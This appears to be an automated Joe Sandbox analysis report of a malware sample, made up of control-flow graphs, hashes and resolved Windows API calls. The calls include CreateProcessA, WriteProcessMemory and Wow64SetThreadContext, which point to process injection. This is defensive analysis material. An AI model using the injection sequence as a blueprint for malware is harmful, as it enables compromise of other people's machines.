                                                                                                                                                    control_flow_graph 456 6abf260-6abf282 457 6abf288-6abf2c3 call 6ab8998 call 6abefe4 call 6abeff4 456->457 458 6abf632-6abf637 456->458 471 6abf2d6-6abf2f6 457->471 472 6abf2c5-6abf2cf 457->472 460 6abf639-6abf63b 458->460 461 6abf641-6abf644 458->461 460->461 464 6abf64c-6abf654 461->464 465 6abf659 464->465 467 6abf65a-6abf661 465->467 474 6abf309-6abf329 471->474 475 6abf2f8-6abf302 471->475 472->471 477 6abf32b-6abf335 474->477 478 6abf33c-6abf35c 474->478 475->474 477->478 480 6abf36f-6abf378 call 6abf004 478->480 481 6abf35e-6abf368 478->481 484 6abf37a-6abf395 call 6abf004 480->484 485 6abf39c-6abf3a5 call 6abf014 480->485 481->480 484->485 490 6abf3c9-6abf3d2 call 6abf024 485->490 491 6abf3a7-6abf3c2 call 6abf014 485->491 497 6abf3dd-6abf3f9 490->497 498 6abf3d4-6abf3d8 call 6abf034 490->498 491->490 502 6abf3fb-6abf401 497->502 503 6abf411-6abf415 497->503 498->497 506 6abf403 502->506 507 6abf405-6abf407 502->507 504 6abf42f-6abf477 503->504 505 6abf417-6abf428 call 6abf044 503->505 513 6abf49b-6abf4a2 504->513 514 6abf479 504->514 505->504 506->503 507->503 515 6abf4b9-6abf4c7 call 6abf054 513->515 516 6abf4a4-6abf4b3 513->516 517 6abf47c-6abf482 514->517 526 6abf4c9-6abf4cb 515->526 527 6abf4d1-6abf4fb call 6abf064 515->527 516->515 519 6abf488-6abf48e 517->519 520 6abf662-6abf668 517->520 523 6abf498-6abf499 519->523 524 6abf490-6abf492 519->524 528 6abf66a-6abf671 520->528 529 6abf6e3-6abf6e5 520->529 523->513 523->517 524->523 526->527 539 6abf528-6abf544 527->539 540 6abf4fd-6abf50b 527->540 528->465 530 6abf673-6abf6a1 528->530 532 6abf6ec-6abf6f9 529->532 533 6abf6a3-6abf6c4 530->533 534 6abf700-6abf710 530->534 532->534 533->534 543 6abf6c6-6abf6cc 533->543 541 6abf8e6-6abf8ed 534->541 542 6abf716-6abf720 534->542 553 6abf557-6abf57e call 6abf074 539->553 554 6abf546-6abf550 539->554 540->539 552 6abf50d-6abf521 540->552 548 6abf8ef-6abf8f7 call 6abf198 541->548 549 6abf8fc-6abf90f 541->549 545 6abf72a-6abf734 542->545 546 6abf722-6abf729 542->546 550 6abf6da-6abf6df 543->550 551 6abf6ce-6abf6d0 543->551 555 6abf73a-6abf77a 545->555 556 6abf919-6abf968 545->556 548->549 550->532 558 6abf6e1 550->558 551->550 552->539 568 6abf580-6abf586 553->568 569 6abf596-6abf59a 553->569 554->553 580 6abf77c-6abf782 555->580 581 6abf792-6abf796 555->581 599 6abf969-6abf96a 556->599 558->529 570 6abf58a-6abf58c 568->570 571 6abf588 568->571 572 6abf59c-6abf5ae 569->572 573 6abf5b5-6abf5d1 569->573 570->569 571->569 572->573 582 6abf5e9-6abf5ed 573->582 583 6abf5d3-6abf5d9 573->583 585 6abf786-6abf788 580->585 586 6abf784 580->586 587 6abf798-6abf7bd 581->587 588 6abf7c3-6abf7db call 6abf188 581->588 582->467 584 6abf5ef-6abf5fd 582->584 590 6abf5db 583->590 591 6abf5dd-6abf5df 583->591 597 6abf60f-6abf613 584->597 598 6abf5ff-6abf60d 584->598 585->581 586->581 587->588 602 6abf7e8-6abf7f0 588->602 603 6abf7dd-6abf7e2 588->603 590->582 591->582 605 6abf619-6abf631 597->605 598->597 598->605 606 6abf96d-6abf96f 599->606 609 6abf7f2-6abf800 602->609 610 6abf806-6abf825 602->610 603->602 607 6abf9dc-6abf9f7 606->607 608 6abf971-6abf981 606->608 616 6abf9f9 607->616 617 6abfa01 607->617 608->599 618 6abf983-6abf985 608->618 609->610 619 6abf83d-6abf841 610->619 620 6abf827-6abf82d 610->620 616->617 621 6abfa02 617->621 618->606 624 6abf987-6abf989 618->624 622 6abf89a-6abf8e3 619->622 623 6abf843-6abf850 619->623 625 6abf82f 620->625 626 6abf831-6abf833 620->626 621->621 622->541 633 6abf852-6abf884 623->633 634 6abf886-6abf893 623->634 624->608 627 6abf98b-6abf9ba 624->627 625->619 626->619 630 6abf9bc 627->630 631 6abf9c1-6abf9d9 627->631 630->631 631->607 633->634 634->622
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1841901090.0000000006AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06AB0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_6ab0000_MfzXU6tKOq.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID: TOf$TOf
                                                                                                                                                    • API String ID: 0-895418668
                                                                                                                                                    • Opcode ID: 3d1de0a723faa078927e3e08592161f1d829d81fb2c5682ef74bfa356493c3cb
                                                                                                                                                    • Instruction ID: 47241e92241b1dbfd5b6e356c12f6b08718f0a637132d5f9a3173d550aa48817
                                                                                                                                                    • Opcode Fuzzy Hash: 3d1de0a723faa078927e3e08592161f1d829d81fb2c5682ef74bfa356493c3cb
                                                                                                                                                    • Instruction Fuzzy Hash: 6A328C74B012049FDB99EB79C950BEEBBFAAF88300F184469E5059B3A2CB35DD41CB51

                                                                                                                                                    Control-flow Graph

                                                                                                                                                    • Executed
                                                                                                                                                    • Not Executed
                                                                                                                                                    control_flow_graph 765 4927278-49272a3 766 49272a5 765->766 767 49272aa-492772f call 4926994 call 4927074 call 4927084 call 4926994 call 4927074 call 4927094 call 49270a4 call 49270b4 call 49270c4 call 49270d4 call 49270e4 call 49270b4 call 49270c4 call 49270d4 call 49270e4 call 49270f4 call 4927104 765->767 766->767 834 4927888-49278a1 767->834 835 49278a7-49278e5 834->835 836 4927734-4927752 834->836 846 49278e7 835->846 847 49278ec-492795d 835->847 837 4927754 836->837 838 4927759-4927773 836->838 837->838 840 4927775 838->840 841 492777a-4927790 838->841 840->841 842 4927792 841->842 843 4927797-49277ba call 4927114 841->843 842->843 849 49277c1-49277d1 843->849 850 49277bc 843->850 846->847 865 4927987 847->865 866 492795f-492796b 847->866 852 49277d3 849->852 853 49277d8-4927812 849->853 850->849 852->853 854 4927814-492781b 853->854 855 492781d 853->855 856 4927824-4927842 854->856 855->856 858 4927844 856->858 859 4927849-492785a 856->859 858->859 860 4927861-4927876 859->860 861 492785c 859->861 867 4927878 860->867 868 492787d-4927885 860->868 861->860 871 492798d-49279ab 865->871 869 4927975-492797b 866->869 870 492796d-4927973 866->870 867->868 868->834 872 4927985 869->872 870->872 874 49279b2-4927a6d 871->874 875 49279ad 871->875 872->871 883 4927a75-4928403 call 4927124 call 4927134 call 49270b4 call 49270c4 call 49270d4 call 49270e4 call 49270b4 call 49270c4 call 4927144 call 49270d4 call 49270e4 call 49270b4 call 49270c4 call 49270d4 call 49270e4 call 4927124 call 4927134 call 4927154 call 49270b4 call 49270c4 call 49270d4 call 49270e4 call 49270b4 call 49270c4 call 49270d4 call 4927164 call 4927174 call 4927184 call 4927194 call 49271a4 call 49271b4 call 49271c4 * 7 call 49270c4 call 49271d4 call 49271e4 call 49271f4 call 4927204 call 4927214 874->883 875->874
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1840840096.0000000004920000.00000040.00000800.00020000.00000000.sdmp, Offset: 04920000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_4920000_MfzXU6tKOq.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID: hNf
                                                                                                                                                    • API String ID: 0-1940841836
                                                                                                                                                    • Opcode ID: 6e0710791bbf35f83384e092412fd0107aa49c4537411e8fab26ea28a48e9f5b
                                                                                                                                                    • Instruction ID: 9f464cc931dbc0e403150db8750b98324f3bb8179cf07309348135b440d267df
                                                                                                                                                    • Opcode Fuzzy Hash: 6e0710791bbf35f83384e092412fd0107aa49c4537411e8fab26ea28a48e9f5b
                                                                                                                                                    • Instruction Fuzzy Hash: EFB2C734A402298FDB54DF64C984ADDB7B2FF8A304F1181E9D949AB365DB31AE85CF40

                                                                                                                                                    Control-flow Graph

                                                                                                                                                    • Executed
                                                                                                                                                    • Not Executed
                                                                                                                                                    control_flow_graph 1013 492726a-49272a3 1014 49272a5 1013->1014 1015 49272aa-4927348 call 4926994 1013->1015 1014->1015 1024 4927352-492735e call 4927074 1015->1024 1026 4927363-492737a 1024->1026 1028 4927384-4927390 call 4927084 1026->1028 1030 4927395-4927410 call 4926994 call 4927074 1028->1030 1040 492741a-4927426 call 4927094 1030->1040 1042 492742b-49274b4 call 49270a4 1040->1042 1050 49274bf-49274d6 call 49270b4 1042->1050 1052 49274db-4927538 call 49270c4 call 49270d4 1050->1052 1057 492753d-4927551 call 49270e4 1052->1057 1059 4927556-49275b3 1057->1059 1062 49275be-49275d5 call 49270b4 1059->1062 1064 49275da-4927650 call 49270c4 call 49270d4 call 49270e4 1062->1064 1071 4927655-492766a 1064->1071 1072 492766f-492772f call 49270f4 call 4927104 1071->1072 1082 4927888-49278a1 1072->1082 1083 49278a7-49278e5 1082->1083 1084 4927734-4927752 1082->1084 1094 49278e7 1083->1094 1095 49278ec-4927927 1083->1095 1085 4927754 1084->1085 1086 4927759-4927773 1084->1086 1085->1086 1088 4927775 1086->1088 1089 492777a-4927790 1086->1089 1088->1089 1090 4927792 1089->1090 1091 4927797-49277ba call 4927114 1089->1091 1090->1091 1097 49277c1-49277d1 1091->1097 1098 49277bc 1091->1098 1094->1095 1110 492792e-4927944 1095->1110 1100 49277d3 1097->1100 1101 49277d8-4927812 1097->1101 1098->1097 1100->1101 1102 4927814-492781b 1101->1102 1103 492781d 1101->1103 1104 4927824-4927842 1102->1104 1103->1104 1106 4927844 1104->1106 1107 4927849-492785a 1104->1107 1106->1107 1108 4927861-4927876 1107->1108 1109 492785c 1107->1109 1115 4927878 1108->1115 1116 492787d-4927885 1108->1116 1109->1108 1111 4927950-492795d 1110->1111 1113 4927987 1111->1113 1114 492795f-492796b 1111->1114 1119 492798d-4927995 1113->1119 1117 4927975-492797b 1114->1117 1118 492796d-4927973 1114->1118 1115->1116 1116->1082 1120 4927985 1117->1120 1118->1120 1121 492799b-49279ab 1119->1121 1120->1119 1122 49279b2-4927a54 1121->1122 1123 49279ad 1121->1123 1130 4927a5e-4927a6d 1122->1130 1123->1122 1131 4927a75-4928403 call 4927124 call 4927134 call 49270b4 call 49270c4 call 49270d4 call 49270e4 call 49270b4 call 49270c4 call 4927144 call 49270d4 call 49270e4 call 49270b4 call 49270c4 call 49270d4 call 49270e4 call 4927124 call 4927134 call 4927154 call 49270b4 call 49270c4 call 49270d4 call 49270e4 call 49270b4 call 49270c4 call 49270d4 call 4927164 call 4927174 call 4927184 call 4927194 call 49271a4 call 49271b4 call 49271c4 * 7 call 49270c4 call 49271d4 call 49271e4 call 49271f4 call 4927204 call 4927214 1130->1131
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1840840096.0000000004920000.00000040.00000800.00020000.00000000.sdmp, Offset: 04920000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_4920000_MfzXU6tKOq.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID: hNf
                                                                                                                                                    • API String ID: 0-1940841836
                                                                                                                                                    • Opcode ID: 7023b0663f7212ff5f6410fa2b18aec658624fc3b574c15621d31bb6feb02bc8
                                                                                                                                                    • Instruction ID: 5d0dc2a00d0a59c53113d227989f12b2c642a127bb4cd6cdeb5cbab99b565025
                                                                                                                                                    • Opcode Fuzzy Hash: 7023b0663f7212ff5f6410fa2b18aec658624fc3b574c15621d31bb6feb02bc8
                                                                                                                                                    • Instruction Fuzzy Hash: 32A2D734A40229CFDB54DF64C984AE9B7B2FF8A304F1181E9D9496B365DB31AE85CF40
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1841901090.0000000006AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06AB0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_6ab0000_MfzXU6tKOq.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 4ee4d569ad141a4df7c133a7899056cc36ca3e3ef74108c7b968931daa41eb82
                                                                                                                                                    • Instruction ID: 978937f8559d97a1c096c09c098e8f3eed2177d909c5cf96b1fc26b6df62e747
                                                                                                                                                    • Opcode Fuzzy Hash: 4ee4d569ad141a4df7c133a7899056cc36ca3e3ef74108c7b968931daa41eb82
                                                                                                                                                    • Instruction Fuzzy Hash: 96B001308DE306CEE7C03D2050695F4A53DB72F296B003844920F67647CA159184C59A

                                                                                                                                                    Control-flow Graph

                                                                                                                                                    • Executed
                                                                                                                                                    • Not Executed
                                                                                                                                                    control_flow_graph 294 6bad88-6bad97 295 6bad99-6bada6 call 6ba0e0 294->295 296 6badc3-6badc7 294->296 303 6bada8 295->303 304 6badbc 295->304 298 6baddb-6bae1c 296->298 299 6badc9-6badd3 296->299 305 6bae29-6bae37 298->305 306 6bae1e-6bae26 298->306 299->298 349 6badae call 6bb020 303->349 350 6badae call 6bb010 303->350 304->296 307 6bae5b-6bae5d 305->307 308 6bae39-6bae3e 305->308 306->305 310 6bae60-6bae67 307->310 311 6bae49 308->311 312 6bae40-6bae47 call 6ba0ec 308->312 309 6badb4-6badb6 309->304 313 6baef8-6bafb8 309->313 315 6bae69-6bae71 310->315 316 6bae74-6bae7b 310->316 317 6bae4b-6bae59 311->317 312->317 344 6bafba-6bafbd 313->344 345 6bafc0-6bafeb GetModuleHandleW 313->345 315->316 320 6bae88-6bae91 call 6ba0fc 316->320 321 6bae7d-6bae85 316->321 317->310 325 6bae9e-6baea3 320->325 326 6bae93-6bae9b 320->326 321->320 327 6baec1-6baece 325->327 328 6baea5-6baeac 325->328 326->325 335 6baef1-6baef7 327->335 336 6baed0-6baeee 327->336 328->327 330 6baeae-6baebe call 6ba10c call 6ba11c 328->330 330->327 336->335 344->345 346 6bafed-6baff3 345->346 347 6baff4-6bb008 345->347 346->347 349->309 350->309
                                                                                                                                                    APIs
                                                                                                                                                    • GetModuleHandleW.KERNELBASE(00000000), ref: 006BAFDE
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1838113803.00000000006B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 006B0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_6b0000_MfzXU6tKOq.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: HandleModule
                                                                                                                                                    • String ID: TOf$TOf
                                                                                                                                                    • API String ID: 4139908857-895418668
                                                                                                                                                    • Opcode ID: 0774f8d2347ed70df105f4823c8331b1d6841950c9a4dec40bbc82623f3ddb64
                                                                                                                                                    • Instruction ID: 7fa47041f1b821222f3ee2d692d3ea5f179bfcd68cf0e91ebe81d67930e1a364
                                                                                                                                                    • Opcode Fuzzy Hash: 0774f8d2347ed70df105f4823c8331b1d6841950c9a4dec40bbc82623f3ddb64
                                                                                                                                                    • Instruction Fuzzy Hash: 5E7113B0A00B058FD764DF69D04179ABBF6BF48304F008A2DD48AD7B50DB75E98ACB95

                                                                                                                                                    Control-flow Graph

                                                                                                                                                    • Executed
                                                                                                                                                    • Not Executed
                                                                                                                                                    control_flow_graph 1261 6abbded-6abbe8d 1264 6abbe8f-6abbe99 1261->1264 1265 6abbec6-6abbee6 1261->1265 1264->1265 1266 6abbe9b-6abbe9d 1264->1266 1272 6abbee8-6abbef2 1265->1272 1273 6abbf1f-6abbf4e 1265->1273 1267 6abbe9f-6abbea9 1266->1267 1268 6abbec0-6abbec3 1266->1268 1270 6abbeab 1267->1270 1271 6abbead-6abbebc 1267->1271 1268->1265 1270->1271 1271->1271 1274 6abbebe 1271->1274 1272->1273 1275 6abbef4-6abbef6 1272->1275 1279 6abbf50-6abbf5a 1273->1279 1280 6abbf87-6abc041 CreateProcessA 1273->1280 1274->1268 1277 6abbf19-6abbf1c 1275->1277 1278 6abbef8-6abbf02 1275->1278 1277->1273 1281 6abbf06-6abbf15 1278->1281 1282 6abbf04 1278->1282 1279->1280 1283 6abbf5c-6abbf5e 1279->1283 1293 6abc04a-6abc0d0 1280->1293 1294 6abc043-6abc049 1280->1294 1281->1281 1284 6abbf17 1281->1284 1282->1281 1285 6abbf81-6abbf84 1283->1285 1286 6abbf60-6abbf6a 1283->1286 1284->1277 1285->1280 1288 6abbf6e-6abbf7d 1286->1288 1289 6abbf6c 1286->1289 1288->1288 1290 6abbf7f 1288->1290 1289->1288 1290->1285 1304 6abc0d2-6abc0d6 1293->1304 1305 6abc0e0-6abc0e4 1293->1305 1294->1293 1304->1305 1306 6abc0d8 1304->1306 1307 6abc0e6-6abc0ea 1305->1307 1308 6abc0f4-6abc0f8 1305->1308 1306->1305 1307->1308 1309 6abc0ec 1307->1309 1310 6abc0fa-6abc0fe 1308->1310 1311 6abc108-6abc10c 1308->1311 1309->1308 1310->1311 1314 6abc100 1310->1314 1312 6abc11e-6abc125 1311->1312 1313 6abc10e-6abc114 1311->1313 1315 6abc13c 1312->1315 1316 6abc127-6abc136 1312->1316 1313->1312 1314->1311 1318 6abc13d 1315->1318 1316->1315 1318->1318
                                                                                                                                                    APIs
                                                                                                                                                    • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 06ABC02E
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1841901090.0000000006AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06AB0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_6ab0000_MfzXU6tKOq.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: CreateProcess
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 963392458-0
                                                                                                                                                    • Opcode ID: 13f4fd9971d382d4e44f1db043169fd2f9c75cafd4acb868a3f0973f5feac505
                                                                                                                                                    • Instruction ID: abb6e81b35687ab1f3a34cb60dcbc6dcdb0da6285704108cfb66fa969499ccc7
                                                                                                                                                    • Opcode Fuzzy Hash: 13f4fd9971d382d4e44f1db043169fd2f9c75cafd4acb868a3f0973f5feac505
                                                                                                                                                    • Instruction Fuzzy Hash: 9CA19B71D00219DFDB50DFA8C841BEEBBB6FF48314F0485A9E809A7251DB749985CFA1

                                                                                                                                                    Control-flow Graph

                                                                                                                                                    • Executed
                                                                                                                                                    • Not Executed
                                                                                                                                                    control_flow_graph 1319 6abbdf8-6abbe8d 1321 6abbe8f-6abbe99 1319->1321 1322 6abbec6-6abbee6 1319->1322 1321->1322 1323 6abbe9b-6abbe9d 1321->1323 1329 6abbee8-6abbef2 1322->1329 1330 6abbf1f-6abbf4e 1322->1330 1324 6abbe9f-6abbea9 1323->1324 1325 6abbec0-6abbec3 1323->1325 1327 6abbeab 1324->1327 1328 6abbead-6abbebc 1324->1328 1325->1322 1327->1328 1328->1328 1331 6abbebe 1328->1331 1329->1330 1332 6abbef4-6abbef6 1329->1332 1336 6abbf50-6abbf5a 1330->1336 1337 6abbf87-6abc041 CreateProcessA 1330->1337 1331->1325 1334 6abbf19-6abbf1c 1332->1334 1335 6abbef8-6abbf02 1332->1335 1334->1330 1338 6abbf06-6abbf15 1335->1338 1339 6abbf04 1335->1339 1336->1337 1340 6abbf5c-6abbf5e 1336->1340 1350 6abc04a-6abc0d0 1337->1350 1351 6abc043-6abc049 1337->1351 1338->1338 1341 6abbf17 1338->1341 1339->1338 1342 6abbf81-6abbf84 1340->1342 1343 6abbf60-6abbf6a 1340->1343 1341->1334 1342->1337 1345 6abbf6e-6abbf7d 1343->1345 1346 6abbf6c 1343->1346 1345->1345 1347 6abbf7f 1345->1347 1346->1345 1347->1342 1361 6abc0d2-6abc0d6 1350->1361 1362 6abc0e0-6abc0e4 1350->1362 1351->1350 1361->1362 1363 6abc0d8 1361->1363 1364 6abc0e6-6abc0ea 1362->1364 1365 6abc0f4-6abc0f8 1362->1365 1363->1362 1364->1365 1366 6abc0ec 1364->1366 1367 6abc0fa-6abc0fe 1365->1367 1368 6abc108-6abc10c 1365->1368 1366->1365 1367->1368 1371 6abc100 1367->1371 1369 6abc11e-6abc125 1368->1369 1370 6abc10e-6abc114 1368->1370 1372 6abc13c 1369->1372 1373 6abc127-6abc136 1369->1373 1370->1369 1371->1368 1375 6abc13d 1372->1375 1373->1372 1375->1375
                                                                                                                                                    APIs
                                                                                                                                                    • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 06ABC02E
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1841901090.0000000006AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06AB0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_6ab0000_MfzXU6tKOq.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: CreateProcess
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 963392458-0
                                                                                                                                                    • Opcode ID: 8f2a9d183cada3aeb2e6037f56644241e041d79c17d9308459438e8dcafa8c61
                                                                                                                                                    • Instruction ID: cef648cff14e60d1a80b2c4e4803f49d735d4a18cfb5d1821e373ac5bb1d7cc6
                                                                                                                                                    • Opcode Fuzzy Hash: 8f2a9d183cada3aeb2e6037f56644241e041d79c17d9308459438e8dcafa8c61
                                                                                                                                                    • Instruction Fuzzy Hash: BC918A71D00219DFDB50DFA8C841BEEBBB6BF48314F0485A9E809A7251DB749985CFA1

                                                                                                                                                    Control-flow Graph

                                                                                                                                                    • Executed
                                                                                                                                                    • Not Executed
                                                                                                                                                    control_flow_graph 1376 6b44b4-6b59d9 CreateActCtxA 1379 6b59db-6b59e1 1376->1379 1380 6b59e2-6b5a3c 1376->1380 1379->1380 1387 6b5a4b-6b5a4f 1380->1387 1388 6b5a3e-6b5a41 1380->1388 1389 6b5a51-6b5a5d 1387->1389 1390 6b5a60 1387->1390 1388->1387 1389->1390 1392 6b5a61 1390->1392 1392->1392
                                                                                                                                                    APIs
                                                                                                                                                    • CreateActCtxA.KERNEL32(?), ref: 006B59C9
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1838113803.00000000006B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 006B0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_6b0000_MfzXU6tKOq.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Create
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 2289755597-0
                                                                                                                                                    • Opcode ID: eed8914a3b8a63ad643d0b603e2421965d4f1717d2310b935ce3d3a13cfe5309
                                                                                                                                                    • Instruction ID: 5cbc651235580b1328d661aff6defaac665a1d2e78c505bf7896ba942819d122
                                                                                                                                                    • Opcode Fuzzy Hash: eed8914a3b8a63ad643d0b603e2421965d4f1717d2310b935ce3d3a13cfe5309
                                                                                                                                                    • Instruction Fuzzy Hash: 4141D2B0C00B19CBDB24DFA9C8847CDBBB6BF48704F24855AD409BB255DB756985CF90

                                                                                                                                                    Control-flow Graph

                                                                                                                                                    • Executed
                                                                                                                                                    • Not Executed
                                                                                                                                                    control_flow_graph 1393 6b590c-6b59d9 CreateActCtxA 1395 6b59db-6b59e1 1393->1395 1396 6b59e2-6b5a3c 1393->1396 1395->1396 1403 6b5a4b-6b5a4f 1396->1403 1404 6b5a3e-6b5a41 1396->1404 1405 6b5a51-6b5a5d 1403->1405 1406 6b5a60 1403->1406 1404->1403 1405->1406 1408 6b5a61 1406->1408 1408->1408
                                                                                                                                                    APIs
                                                                                                                                                    • CreateActCtxA.KERNEL32(?), ref: 006B59C9
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1838113803.00000000006B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 006B0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_6b0000_MfzXU6tKOq.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Create
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 2289755597-0
                                                                                                                                                    • Opcode ID: 1a4025c6d06d5175c3707eefe1637fa673db2821b87ff2c9fb9df5bd7f5d67e4
                                                                                                                                                    • Instruction ID: e276d5a3d7e0d146f5f39242221f441c536bdf41b88c12fc336a6a26a336db3c
                                                                                                                                                    • Opcode Fuzzy Hash: 1a4025c6d06d5175c3707eefe1637fa673db2821b87ff2c9fb9df5bd7f5d67e4
                                                                                                                                                    • Instruction Fuzzy Hash: D341EEB0C00A19CEDB24DFA9C8847CDBBB6BF48304F24856AD449BB255DB756986CF90
                                                                                                                                                    APIs
                                                                                                                                                    • CallWindowProcW.USER32(?,?,?,?,?), ref: 04924111
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1840840096.0000000004920000.00000040.00000800.00020000.00000000.sdmp, Offset: 04920000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_4920000_MfzXU6tKOq.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: CallProcWindow
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 2714655100-0
                                                                                                                                                    • Opcode ID: 1eac3b8e8991bacbe6b475773a17f8be2e89f6be97e145a91c0b0b33e9e3bc54
                                                                                                                                                    • Instruction ID: cb18889d6851d01f5b7e7f2c9797552ecb59c927810849eef67f87acffd42d53
                                                                                                                                                    • Opcode Fuzzy Hash: 1eac3b8e8991bacbe6b475773a17f8be2e89f6be97e145a91c0b0b33e9e3bc54
                                                                                                                                                    • Instruction Fuzzy Hash: 19413BB4A00315DFDB14CF99C848AAABBF5FF98314F24C459E519AB325D375A881CFA0
                                                                                                                                                    APIs
                                                                                                                                                    • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 06ABBC00
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1841901090.0000000006AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06AB0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_6ab0000_MfzXU6tKOq.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: MemoryProcessWrite
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 3559483778-0
                                                                                                                                                    • Opcode ID: 0dc837244b532bd37afd783601364032d21306f1b73fede9a9c1536885c5cf01
                                                                                                                                                    • Instruction ID: c3f8ba07c59173e5c6cb06ce05d0477eb20ec8442718ebabe4b67b2e0324f6ab
                                                                                                                                                    • Opcode Fuzzy Hash: 0dc837244b532bd37afd783601364032d21306f1b73fede9a9c1536885c5cf01
                                                                                                                                                    • Instruction Fuzzy Hash: C52135B19003499FCB10DFA9C981BDEBBF5FF48310F108429E959A7251CB78A944CBA4
                                                                                                                                                    APIs
                                                                                                                                                    • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 06ABBC00
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1841901090.0000000006AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06AB0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_6ab0000_MfzXU6tKOq.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: MemoryProcessWrite
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 3559483778-0
                                                                                                                                                    • Opcode ID: 2fcdc2b986fd32e9d98e58ed1daa3782d3b8358d6ed138b72a82e9b074e4319d
                                                                                                                                                    • Instruction ID: 984e33a95428b9c6165c4e5c77879e57afd5c5e0cc8376789c0cf8b7ad34c212
                                                                                                                                                    • Opcode Fuzzy Hash: 2fcdc2b986fd32e9d98e58ed1daa3782d3b8358d6ed138b72a82e9b074e4319d
                                                                                                                                                    • Instruction Fuzzy Hash: C52126B19003599FCB10DFA9C885BDEBBF5FF48310F108429E959A7251CB78A954CBA4
                                                                                                                                                    APIs
                                                                                                                                                    • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 06ABBA56
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1841901090.0000000006AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06AB0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_6ab0000_MfzXU6tKOq.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: ContextThreadWow64
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 983334009-0
                                                                                                                                                    • Opcode ID: 59027da59a1c2e5dcac7bc9d242224f5c55d6ccbf5c7c2e24dec6154b793e2c5
                                                                                                                                                    • Instruction ID: b91c04fe46238e93f754700c547848514f8e53c6bd9033c478196a5f91a14078
